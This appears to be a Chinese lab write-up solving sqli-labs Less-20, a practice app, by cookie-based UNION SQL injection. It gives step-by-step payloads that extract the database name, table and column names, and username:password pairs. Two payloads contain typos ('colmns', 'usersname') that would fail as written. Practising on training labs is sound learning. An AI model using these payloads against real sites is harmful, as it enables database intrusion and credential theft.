sqli-labs-Less-20自动化注入方法

sqli-labs 实验记录

Less-20

这一关与前两关类似,需要通过分析源码进行手动报错注入,但注入点与之前的关卡不同,为Cookie,且可以使用Union Select联合注入方法。

第一步:分别输入正确与错误的用户名与密码,查找注入点

结合上一关爆出的数据,在用户与密码栏中分别输入正确与错误的数据:uname=Dumb passwd=12 与passwd=Dumb

结果如图如示:在密码正确的页面返回了Cookie信息,密码错误的页面只显示登陆失败。因此,我们考虑在Cookie这一点进行联合注入。

第二步:查询服务器中的当前数据库

利用Hackbar插件,在Cookie这一点输入如下数据:

复制代码
' union select 1,2,3 --+

结果如图所示:可以看到在name和password两个地方进行了回显,因此,可以进一步修改上面的数据:

复制代码
' union select 1,database(),3 --+

结果如图所示:在原先数字2的地方回显出当前数据库:security。

第三步:查询指定数据库中的表

继续使用hackbar插件,在Cooike注入点输入字符串:

复制代码
' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的列

继续使用hackbar插件,在Cooike注入点输入字符串:

复制代码
' union select 1,(select group_concat(column_name) from information_schema.colmns where table_schema='security' and table_name='users'),3--+

查询结果如图所示:数据列共有3个,分别是id,username,password。

第五步:查询指定数据表中的具体信息

继续使用hackbar插件,在Cookie注入点输入字符串:

复制代码
' union select 1,(select concat(usersname,':',password) from security.users limit 0,1),3--+

结果如图所示:查询出一条数据,用户名为Dumb,密码为12。

如果需要继续查找其它数据,只需将"limit 0,1"中的'0',进行相应的修改,如"limit 1,1","limit 2,1"等等。

相关推荐
CDN3601 小时前
360CDN SDK 游戏盾:轻量化接入 + 强防护实测
运维·游戏·网络安全
hzhsec2 小时前
MSF-CobaltStrike实现内网socks代理转发上线
服务器·网络·安全·网络安全
mygljx2 小时前
MySQL 数据库连接池爆满问题排查与解决
android·数据库·mysql
Bdygsl3 小时前
MySQL(1)—— 基本概念和操作
数据库·mysql
身如柳絮随风扬3 小时前
什么是左匹配规则?
数据库·sql·mysql
jiankeljx4 小时前
mysql之如何获知版本
数据库·mysql
小李来了!4 小时前
数据库DDL、DML、DQL、DCL详解
数据库·mysql
我科绝伦(Huanhuan Zhou)5 小时前
【生产案例】MySQL InnoDB 数据损坏崩溃修复
数据库·mysql·adb
海棠蚀omo6 小时前
从零敲开 MySQL 的大门:库与表的基础操作实战(保姆级入门指南)
数据库·mysql
廋到被风吹走6 小时前
【MySql】超时问题分析
java·数据库·mysql